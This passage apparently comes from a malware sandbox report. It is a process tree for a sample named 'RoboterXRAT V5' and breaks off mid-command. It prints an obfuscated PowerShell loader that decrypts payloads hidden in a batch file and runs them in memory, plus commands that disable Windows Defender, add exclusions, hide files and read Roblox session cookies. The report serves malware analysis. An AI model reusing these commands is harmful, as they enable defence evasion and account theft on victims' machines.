        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        31⤵
        
        PID:5956
        
        C:\Windows\system32\net.exe
        
        net file
        32⤵
        
        PID:5556
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        33⤵
        
        PID:4656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:5296
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:6244
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        46⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        46⤵
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        45⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        
        PID:6500
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        44⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        44⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        43⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        
        PID:6848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:984
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        44⤵
        Views/modifies file attributes
        
        PID:3872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:2484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        44⤵
        
        PID:1784
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        44⤵
        
        PID:4148
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:5720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        44⤵
        Detects videocard installed
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        42⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        42⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        41⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        
        PID:7060
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        40⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        40⤵
        
        PID:6616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:6320
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        Views/modifies file attributes
        
        PID:3156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:6344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:1532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:6932
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:4936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:6808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1064
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:4148
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1476
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        39⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        38⤵
        
        PID:6756
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:6772
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:6440
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        36⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        36⤵
        
        PID:1108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:4944
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        Views/modifies file attributes
        
        PID:5756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:6864
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        37⤵
        
        PID:4792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        37⤵
        
        PID:6720
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:6252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5048
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        37⤵
        Detects videocard installed
        
        PID:5300
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2884
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        35⤵
        
        PID:6300
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        35⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        34⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        34⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        33⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:4216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        30⤵
        
        PID:1960
        
        C:\Windows\system32\net.exe
        
        net file
        31⤵
        
        PID:6492
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        32⤵
        
        PID:6976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:5500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        29⤵
        
        PID:3156
        
        C:\Windows\system32\net.exe
        
        net file
        30⤵
        
        PID:1520
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        31⤵
        
        PID:3160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:432
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:5404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        28⤵
        
        PID:368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:2824
        
        C:\Windows\system32\net.exe
        
        net file
        29⤵
        
        PID:5524
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        30⤵
        
        PID:2416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:6728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        27⤵
        
        PID:5324
        
        C:\Windows\system32\net.exe
        
        net file
        28⤵
        
        PID:6840
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        29⤵
        
        PID:1784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in 